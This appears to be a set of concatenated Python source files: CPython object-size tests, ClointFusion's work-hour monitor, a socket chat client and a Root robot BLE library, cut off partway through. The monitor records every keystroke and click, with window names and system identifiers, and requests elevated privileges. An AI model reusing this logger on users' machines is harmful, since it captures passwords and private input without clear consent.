check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
BRE_WHM.pyw
|
#BOT Recommendation Engine and Work Hour Monitor
import sqlite3
import os
import sys
import datetime
import time
from dateutil import parser
from pathlib import Path
import PySimpleGUI as sg
import traceback
import platform,socket,re,uuid,json,logging
from pynput.mouse import Listener as MouseListener
from pynput.keyboard import Listener as KeyboardListener
from elevate import elevate
import pyinspect as pi
import pyautogui as pg
from ClointFusion import selft
import threading
user_uuid = selft.get_uuid()
pi.install_traceback(hide_locals=True,relevant_only=True,enable_prompt=True)
os_name = str(platform.system()).lower()
windows_os = "windows"
linux_os = "linux"
mac_os = "darwin"
if os_name == windows_os:
clointfusion_directory = r"C:\Users\{}\ClointFusion".format(str(os.getlogin()))
elif os_name == linux_os:
clointfusion_directory = r"/home/{}/ClointFusion".format(str(os.getlogin()))
elif os_name == mac_os:
clointfusion_directory = r"/Users/{}/ClointFusion".format(str(os.getlogin()))
img_folder_path = Path(os.path.join(clointfusion_directory, "Images"))
config_folder_path = Path(os.path.join(clointfusion_directory, "Config_Files"))
cf_splash_png_path = Path(os.path.join(clointfusion_directory,"Logo_Icons","Splash.PNG"))
cf_icon_cdt_file_path = os.path.join(clointfusion_directory,"Logo_Icons","Cloint-ICON-CDT.ico")
last_click = ""
COUNTER = 1
# elevate(show_console=False)
try:
db_file_path = r'{}\BRE_WHM.db'.format(str(config_folder_path))
connct = sqlite3.connect(db_file_path,check_same_thread=False)
cursr = connct.cursor()
except: #Ask ADMIN Rights if REQUIRED
if os_name == windows_os:
elevate(show_console=False)
else:
elevate(graphical=False)
connct = sqlite3.connect(r'{}\BRE_WHM.db'.format(str(config_folder_path)),check_same_thread=False)
cursr = connct.cursor()
# connct.execute("DROP TABLE SYS_CONFIG")
# connct.execute("DROP TABLE CFEVENTS")
# Creating table
sys_config_table = """ CREATE TABLE SYS_CONFIG (
uuid TEXT PRIMARY KEY NOT NULL,
platform TEXT NULL,
platform_release TEXT NULL,
platform_version TEXT NULL,
architecture TEXT NULL,
hostname TEXT NULL,
ip_addr TEXT NULL,
mac_addr TEXT NULL,
processor TEXT NULL
); """
try:
cursr.execute(sys_config_table)
cursr.execute("Insert into SYS_CONFIG values(?,?,?,?,?,?,?,?,?)", (user_uuid), str(platform.system()), str(platform.release()),str(platform.version()),str(platform.machine()),str(socket.gethostname()),str(socket.gethostbyname(socket.gethostname())),str(':'.join(re.findall('..', '%012x' % uuid.getnode()))),str(platform.processor()))
connct.commit()
except sqlite3.OperationalError:
pass
except Exception as ex :
print(f"Exception: {ex}")
try:
cursr.execute("ALTER TABLE SYS_CONFIG DROP COLUMN RAM")
connct.commit()
except:
pass
event_table = """ CREATE TABLE IF NOT EXISTS CFEVENTS (
TIME_STAMP TEXT NOT NULL,
Event_Name TEXT NULL,
X TEXT NULL,
Y TEXT NULL,
KEY TEXT NULL,
Button_Name TEXT NULL,
Click_Count TEXT NULL,
Window_Name TEXT NULL,
Mouse_RGB TEXT NULL,
SNIP_File_Path TEXT NULL
); """
cursr.execute(event_table)
connct.commit()
def get_time_stamp():
st = time.time()
ts = datetime.datetime.fromtimestamp(st).strftime('%Y-%m-%d %H:%M:%S')
return ts
def get_active_window():
"""
Get the currently active window.
Returns
-------
string :
Name of the currently active window.
"""
active_window_name = None
if sys.platform in ['linux', 'linux2']:
try:
import wnck
except ImportError:
print("wnck not installed")
wnck = None
if wnck is not None:
screen = wnck.screen_get_default()
screen.force_update()
window = screen.get_active_window()
if window is not None:
pid = window.get_pid()
with open("/proc/{pid}/cmdline".format(pid=pid)) as f:
active_window_name = f.read()
else:
try:
from gi.repository import Gtk, Wnck
gi = "Installed"
except ImportError:
print("gi.repository not installed")
gi = None
if gi is not None:
Gtk.init([]) # necessary if not using a Gtk.main() loop
screen = Wnck.Screen.get_default()
screen.force_update() # recommended per Wnck documentation
active_window = screen.get_active_window()
pid = active_window.get_pid()
with open("/proc/{pid}/cmdline".format(pid=pid)) as f:
active_window_name = f.read()
elif sys.platform in ['Windows', 'win32', 'cygwin']:
import win32gui
window = win32gui.GetForegroundWindow()
active_window_name = win32gui.GetWindowText(window)
elif sys.platform in ['Mac', 'darwin', 'os2', 'os2emx']:
from AppKit import NSWorkspace
active_window_name = (NSWorkspace.sharedWorkspace()
.activeApplication()['NSApplicationName'])
else:
print("sys.platform={platform} is unknown. Please report."
.format(platform=sys.platform))
return active_window_name
def on_release(key):
try:
try:
windw=str(get_active_window())
except:
windw = "unknown"
windw = str(windw)
if str(windw).strip() == "" or str(windw).strip() == "Program Manager":
windw = "Desktop"
# GRB color below cursor
try:
rgb_pixels = pg.pixel(*pg.position())
except:
rgb_pixels = "N/A"
cursr.execute("Insert into CFEVENTS values(?,?,?,?,?,?,?,?,?,?)", (str(get_time_stamp()),"Key Press",str(pg.position()[0]),str(pg.position()[1]),str(key),"N/A","N/A",str(windw).replace("*",""),str(rgb_pixels), "N/A"))
connct.commit()
except Exception as ex:
print("Error in on_press="+str(ex))
def on_press(key):
pass
def on_click(x, y, button, pressed):
global last_click
global COUNTER
click_count = 1
try:
if pressed:
pass
if not pressed:
if last_click:
button_lst = last_click.split("#")
if str(button) == "Button.left" and button_lst[0] == "Button.left":
difference = datetime.datetime.now() - parser.parse(button_lst[1])
if difference.microseconds < 200000:
click_count = 2
last_click = str(button) + "#" + str(datetime.datetime.now())
try:
windw = str(get_active_window())
except:
windw = "unknown"
if str(windw).strip() == "" or str(windw).strip() == "Program Manager":
windw = "Desktop"
# img=pg.screenshot()
#GRB color below cursor
try:
rgb_pixels = pg.pixel(x,y)
except:
rgb_pixels = "N/A"
#snip image
# try:
# img=img.crop((x-40,y-40,x+40,y+40))
# except:
# img=img.crop((x-30,y-30,x+30,y+30))
# outputStr = ''.join(e for e in windw if e.isalnum())
# snip_save_path = str(img_folder_path) + "\\" + str(COUNTER) + "-" + str(outputStr) + "-" + str(x) + "_" + str(y) + ".PNG"
snip_save_path = ""
# try:
# # img.save(snip_save_path)
# except:
# pass
#capture mini-screenshot
# screenshot_save_path = str(img_folder_path) + str(COUNTER) + "-" + str(windw) + "-" + str(x) + "_" + str(y) + "_SS.png"
# try:
# im = pg.screenshot(screenshot_save_path,region=(pg.position()[0]-150,pg.position()[1]-150,300, 300)) #mini screenshot
# except:
# pass
try:
cursr.execute("Insert into CFEVENTS values(?,?,?,?,?,?,?,?,?,?)", (get_time_stamp(),"Mouse Click",str(pg.position()[0]),str(pg.position()[1]),"N/A",str(button),str(click_count),str(windw).replace("*",""),str(rgb_pixels),str(snip_save_path)))
connct.commit()
except:
pass
COUNTER = COUNTER + 1
except Exception as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
print(exc_type)
print(exc_value)
print(exc_traceback)
print("Error in on_click="+str(ex))
def launch_cf_log_generator_gui():
keyboard_listener = KeyboardListener(on_release=on_release)
mouse_listener = MouseListener( on_click=on_click)
try:
cloint_small_logo_x_base64 = b'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'
sg.SetOptions(element_padding=(0,0), button_element_size=(10,1), auto_size_buttons=False)
layout = [[sg.Text("ClointFusion's Log Generator",font=('Helvetica', 10),text_color='Orange')],
[sg.Text("..running in background..",text_color='yellow')],
[sg.Text('', size=(8, 2), font=('Helvetica', 12), justification='center', key='text')],
[sg.Exit(button_text='Stop',button_color=('white', 'firebrick4'),key='Exit')]]
window = sg.Window('ClointFusion', layout, no_titlebar=True, auto_size_buttons=False, keep_on_top=True, grab_anywhere=True,element_justification='c',auto_close=False,use_default_focus=True,icon=cloint_small_logo_x_base64)
current_time = 0
paused = False
start_time = int(round(time.time() * 100))
keyboard_listener.start()
mouse_listener.start()
while True:
# --------- Read and update window --------
if not paused:
event, values = window.read(timeout=10)
current_time = int(round(time.time() * 100)) - start_time
else:
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Exit':
try:
keyboard_listener.stop()
mouse_listener.stop()
except:
pass
break
# --------- Display timer in window --------
window['text'].update('{:02d}:{:02d}'.format((current_time // 100) // 60,
(current_time // 100) % 60))
# window_show_desktop()
window.Close()
except Exception as ex:
print("Error in launch_cf_log_generator_gui="+str(ex))
# def pause():
# # pg.alert("RR")
# print("PAUSED")
def exit(keyboard_listener,mouse_listener):
try:
keyboard_listener.stop()
mouse_listener.stop()
os._exit(0)
except:
pass
def _getServerVersion():
global s_version
try:
response = requests.get(f'https://pypi.org/pypi/ClointFusion/json')
s_version = response.json()['info']['version']
except Warning:
pass
return s_version
def _getCurrentVersion():
global c_version
try:
if os_name == windows_os:
c_version = os.popen('pip show ClointFusion | findstr "Version"').read()
elif os_name == linux_os:
c_version = os.popen('pip3 show ClointFusion | grep "Version"').read()
c_version = str(c_version).split(":")[1].strip()
except:
pass
return c_version
def get_versions():
get_current_version_thread = threading.Thread(target=_getCurrentVersion, name="GetCurrentVersion")
get_current_version_thread.start()
get_server_version_thread = threading.Thread(target=_getServerVersion, name="GetServerVersion")
get_server_version_thread.start()
get_current_version_thread.join()
get_server_version_thread.join()
def _get_site_packages_path():
"""
Returns Site-Packages Path
"""
import subprocess
try:
import site
site_packages_path = next(p for p in site.getsitepackages() if 'site-packages' in p)
except:
site_packages_path = subprocess.run('python -c "import os; print(os.path.join(os.path.dirname(os.__file__), \'site-packages\'))"',capture_output=True, text=True).stdout
site_packages_path = str(site_packages_path).strip()
return str(site_packages_path)
def call_colab_launcher():
try:
cmd = f'python "{_get_site_packages_path()}\ClointFusion\Colab_Launcher.py"'
os.system(cmd)
except Exception as ex :
print("Error in call_colab_launcher" + str(ex))
def call_dost_client():
try:
cmd = f'python "{_get_site_packages_path()}\ClointFusion\DOST_CLIENT.pyw"'
os.system(cmd)
except Exception as ex :
print("Error in call_dost_client" + str(ex))
def call_bol():
try:
cmd = f'python "{_get_site_packages_path()}\ClointFusion\Bol.pyw"'
os.system(cmd)
except Exception as ex:
print("Error in call_bol " + str(ex))
def launch_cf_log_generator_gui_new():
try:
from pystray import Icon as icon, Menu as menu, MenuItem as item
from PIL import Image
import webbrowser
keyboard_listener = KeyboardListener(on_release=on_release)
mouse_listener = MouseListener( on_click=on_click)
keyboard_listener.start()
mouse_listener.start()
image = Image.open(cf_splash_png_path)
icon('ClointFusion', image, f"ClointFusion, Made in India with LOVE, version : {_getCurrentVersion()}",menu=menu(
item(
'About',
lambda icon, item: webbrowser.open_new("https://sites.google.com/view/clointfusion-hackathon")),
item(
'Colab Launcher',
lambda icon, item: call_colab_launcher()),
# lambda icon, item: webbrowser.open_new("https://colab.research.google.com/github/ClointFusion/ClointFusion/blob/master/ClointFusion_Labs.ipynb")),
item(
'Bol (Talk)',
lambda icon, item: call_bol()),
item(
'Dost Client',
lambda icon, item: call_dost_client()),
item(
'Work Report',
lambda icon, item: icon.notify("Hi, This is your work hour monitor powered by ClointFusion. Just open a command prompt and type 'work' to view the report")),
item(
'Exit',
lambda icon, item: exit(keyboard_listener,mouse_listener)))).run()
except Exception as ex:
print("Error in launch_cf_log_generator_gui_new="+str(ex))
try:
launch_cf_log_generator_gui_new()
except Exception as ex:
pg.alert(ex)
|
old_client.py
|
import socket
import threading
import sys
import os
import json
class Client:
# creates socket using TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# on client class init, connect to the ip address
# and port and send the session_url to the server
# to be added to the connections list
def __init__(self, address, port, session_url):
self.address = address
self.port = port
self.session_url = session_url
def run(self):
self.sock.connect((self.address, self.port))
print("Connected to socket lobby.")
self.sock.send(self.session_url.encode())
# start a thread for the client to broadcast over the lobby
iThread = threading.Thread(target=self.send_msg)
iThread.daemon = True
iThread.start()
# receives information from server and prints
# it to stdin
while True:
data = self.sock.recv(1024)
if not data:
break
print(str(data, "utf-8"))
def send_msg(self):
while True:
# sends stdin to lobby to be broadcasted
self.sock.send(bytes(input(""), "utf-8"))
# if __name__ == "__main__":
# Client("localhost", 10000)
|
root.py
|
# External Dependencies
import threading
import time
from struct import pack, unpack
import queue
import numpy
# Internal Dependencies
from .packet import Packet
class Root(object):
"""Simplifies communication with a real Root robot.
Unless otherwise indicated, all methods are non-blocking.
Packets are sent to the robot and received in separate threads;
replies are interpreted when received and responses are placed
in internal class state variables.
Full descriptions of Root BLE packets can be found at
RootRobotics/root-robot-ble-protocol
"""
def __init__(self, phy):
"""Sets up data link layer for Root robot. Kicks off some threads
used to manage the connection, and uses initialize_state() to
populate some information about the robot into the class.
Parameters
----------
phy: RootPhy
Initialized RootPhy object. Used to pick physical layer.
"""
self._phy = phy
# do some check here to be sure phy is an initialized RootPhy object
try:
self._tx_q = queue.SimpleQueue()
except AttributeError:
self._tx_q = queue.Queue()
self._rx_q = self._phy.rx_q
self.pending_lock = threading.Lock()
self.pending_resp = []
"""list: List of responses pending from the robot."""
self.sniff_mode = False
"""bool: If True, shows the raw transactions to and from the robot."""
self.ignore_crc_errors = False
"""bool: If true, ignores CRC errors in packets from the robot."""
self.stop_project_flag = threading.Event()
"""Event: signals that Stop Project message was received."""
self.state = {}
"""dict: Contains local state of robot"""
self._last_coord = (0+0j)
"""complex: Contains last known coordinates of robot."""
self._last_theta_x10 = 900
"""int: Contains last known heading of robot."""
self.create_empty_state()
threading.Thread(target = self._sending_thread).start()
threading.Thread(target = self._receiving_thread).start()
threading.Thread(target = self._expiration_thread).start()
self.initialize_state()
def is_running(self):
"""Utility function for determining state of phy thread."""
return self._phy.is_connected()
def disconnect(self, timeout = 3):
"""Request disconnect from the robot and shut down connection.
Parameters
-------
timeout : float
Number of seconds to wait for all pending transmissions to
be sent before forcing the disconnect at the physical layer.
"""
self._tx_q.put((Packet(0, 6, 0), False))
t = time.time() + timeout
while time.time() < t and self.transmissions_pending():
time.sleep(0.1)
self._phy.disconnect()
def create_empty_state(self):
"""Set up internal state dictionary with all state set to None.
"""
for devnum, device in self.supported_devices.items():
self.state[device] = None
for devnum, device in self.virtual_devices.items():
self.state[device] = None
def initialize_state(self):
"""Initialize internal state dictionary.
Since certain versions of the main board protocol don't support
CRC properly, also request version information and set some
internal flags so that warnings are thrown appropriately.
"""
self.disable_events()
time.sleep(1) # not sure why this is necessary
self.get_versions(self.main_board)
self.get_versions(self.color_board)
timeout = time.time() + 5
blocked = True
while time.time() < timeout and blocked:
try:
if self.state['General'][self.main_board] < 1.011:
self.ignore_crc_errors = True
blocked = False
except TypeError:
time.sleep(0.1)
if blocked == True:
print('Warning: could not get main board version')
self.get_name()
self.get_serial_number()
self.get_battery_level()
self.enable_events()
#TODO: Use enums here and elsewhere
main_board = 0xA5
color_board = 0xC6
def get_versions(self, board):
"""Requests the firmware version of a particular board in the robot.
Parameters
----------
board : byte
Byte defining the board whose version is being requested.
For convenience, the following constants are defined:
* main_board
* color_board
"""
self._tx_q.put((Packet(0, 0, 0, payload=bytes([board])), True))
def set_name(self, name):
"""Sets the robot's name.
Parameters
----------
name : str
New name for the robot.
Returns
-------
utf_name : bytes
Actual name set for the robot, since the name requested may not fit.
Truncates the name if its UTF-8 representation is longer than 16 bytes.
Returns None if the name supplied cannot be converted.
"""
try:
utf_name = name.encode('utf-8')
while len(utf_name) > Packet.PAYLOAD_LEN:
name = name[:-1]
utf_name = name.encode('utf-8')
except AttributeError:
return None
if utf_name == b'':
name = b'\x46\x4c\x45\x41'
self._tx_q.put((Packet(0, 1, 0, payload=utf_name), False))
return utf_name
def get_name(self):
"""Requests the robot's name."""
self._tx_q.put((Packet(0, 2, 0), True))
def stop_and_reset(self):
"""Requests robot stop and cancel all pending actions."""
self._tx_q.put((Packet(0, 3, 0), False))
def enable_events(self):
"""Currently enables all events from the robot.
TODO: Request better documentation about the payload of
this packet and implement it.
"""
payload = bytes([0xFF] * Packet.PAYLOAD_LEN)
self._tx_q.put((Packet(0, 7, 0, payload=payload), False))
def disable_events(self):
"""Currently disables all events from the robot.
TODO: Request better documentation about the payload of
this packet and implement it.
"""
payload = bytes([0xFF] * Packet.PAYLOAD_LEN)
self._tx_q.put((Packet(0, 9, 0, payload=payload), False))
def get_enabled_events(self):
"""Request bitfield of enabled devices."""
self._tx_q.put((Packet(0, 11, 0), True))
def get_serial_number(self):
"""Request robot serial number."""
self._tx_q.put((Packet(0, 14, 0), True))
def set_motor_speeds(self, left, right):
"""Set left and right motor linear velocities.
Parameters
----------
left : int
Left motor speed in units of mm/s.
right : int
Right motor speed in units of mm/s.
"""
left = pack('>i', self._bound(left, -100, 100))
right = pack('>i', self._bound(right, -100, 100))
self._tx_q.put((Packet(1, 4, 0, payload=left + right), False))
def set_left_motor_speed(self, left):
"""Set left motor linear velocity.
Parameters
----------
left : int
Left motor speed in units of mm/s.
"""
left = pack('>i', self._bound(left, -100, 100))
self._tx_q.put((Packet(1, 6, 0, payload=left), False))
def set_right_motor_speed(self, right):
"""Set right motor linear velocity.
Parameters
----------
right : int
Right motor speed in units of mm/s.
"""
right = pack('>i', self._bound(right, -100, 100))
self._tx_q.put((Packet(1, 7, 0, payload=right), False))
def drive_distance(self, distance):
"""Drive in a straight line for a certain distance.
Parameters
----------
distance : int
Distance to travel in units of mm.
"""
self._tx_q.put((Packet(1, 8, 0, payload=pack('>i', distance)), True))
def rotate_angle(self, angle):
"""Turn the robot in place by a particular angle.
Parameters
----------
angle : int
Angle to turn in units of deci-degrees.
"""
self._tx_q.put((Packet(1, 12, 0, payload=pack('>i', angle)), True))
def drive_arc(self, angle, radius):
"""Drive in an arc subtending a particular angle along a circle.
Parameters
----------
angle : int
Angle of an arc to drive along, in deci-degrees.
radius : int
Radius of the circle upon which to travel.
"""
payload = pack('>ii', angle, radius)
self._tx_q.put((Packet(1, 27, 0, payload=payload), True))
def drive_xy(self, x, y):
"""Drive to a particular coordinate in the XY plane.
Parameters
----------
x : float
X coordinate to which to head.
y : float
Y coordinate to which to head.
"""
self.drive_complex(x + y * 1j)
def drive_complex(self, coord):
"""Drive to a particular coordinate in the XY plane.
Parameters
----------
coord : complex
Coordinate to which to head, described as a complex number.
"""
vector = (coord - self._last_coord)
dist = numpy.linalg.norm(vector)
theta = numpy.angle(vector, deg=True)
theta_x10 = int(theta * 10)
turn = ((self._last_theta_x10 - theta_x10 + 1800) % 3600) - 1800
dist = int(dist)
#print(self._last_theta_x10, '->', theta_x10, ':', turn)
#print('turn', turn/10, ' drive', dist)
self.rotate_angle(turn)
self.drive_distance(dist)
self._last_coord = (numpy.real(self._last_coord) + dist * numpy.cos(theta_x10/10*numpy.pi/180)) + \
(numpy.imag(self._last_coord) + dist * numpy.sin(theta_x10/10*numpy.pi/180))*1j
self._last_theta_x10 = theta_x10
marker_up_eraser_up = 0
marker_down_eraser_up = 1
marker_up_eraser_down = 2
def set_marker_eraser_pos(self, pos):
"""Set the Marker/Eraser actuator to a particular position.
Parameters
----------
pos : byte
Byte describing the position to acquire.
For convenience, the following constants are defined.
* marker_up_eraser_up
* marker_down_eraser_up
* marker_up_eraser_down
"""
pos = self._bound(pos, 0, 2)
#print('Set pen', pos)
self._tx_q.put((Packet(2, 0, 0, payload=bytes([pos])), True))
led_animation_off = 0
led_animation_on = 1
led_animation_blink = 2
led_animation_spin = 3
def set_led_animation(self, state, red, green, blue):
"""Animate the LED lights on top of the robot.
Parameters
----------
state : byte
Byte describing the animation style.
For convenience, the following constants are defined.
* led_animation_off
* led_animation_on
* led_animation_blink
* led_animation_spin
red : byte
Brightness level of the red channel.
green : byte
Brightness level of the green channel.
blue : byte
Brightness level of the blue channel.
"""
payload = bytes([self._bound(state, 0, 3), red, green, blue])
self._tx_q.put((Packet(3, 2, 0, payload=payload), False))
def get_color_sensor_data(self, bank, lighting, fmt):
"""Request raw color sensor data.
Parameters
----------
bank : byte
Which (of four) banks from which to get data.
lighting : byte
Which (of five) styles to illuminate the sensor.
fmt : bye
Which (of two) formats to receive the data.
"""
bank = self._bound(bank, 0, 3)
lighting = self._bound(lighting, 0, 4)
fmt = self._bound(fmt, 0, 1)
payload = bytes([bank, lighting, fmt])
self._tx_q.put((Packet(4, 1, 0, payload=payload), True))
def play_note(self, frequency, duration):
"""Play a frequency using the buzzer.
Parameters
----------
frequency : int
Frequency of square wave to play, in units of Hertz
duration : int
Duration to play, in units of milliseconds
"""
payload = pack('>IH', frequency, duration)
self._tx_q.put((Packet(5, 0, 0, payload=payload), True))
def stop_note(self):
"""Stop playing sound through the buzzer immediately."""
self._tx_q.put((Packet(5, 1, 0), False))
def say_phrase(self, phrase):
"""Speak a phrase in Root's language.
Parameters
----------
phrase : str
Phase to "speak."
Returns
-------
utf_phrase: bytes
Actual phrase may be truncated to fit in packet payload.
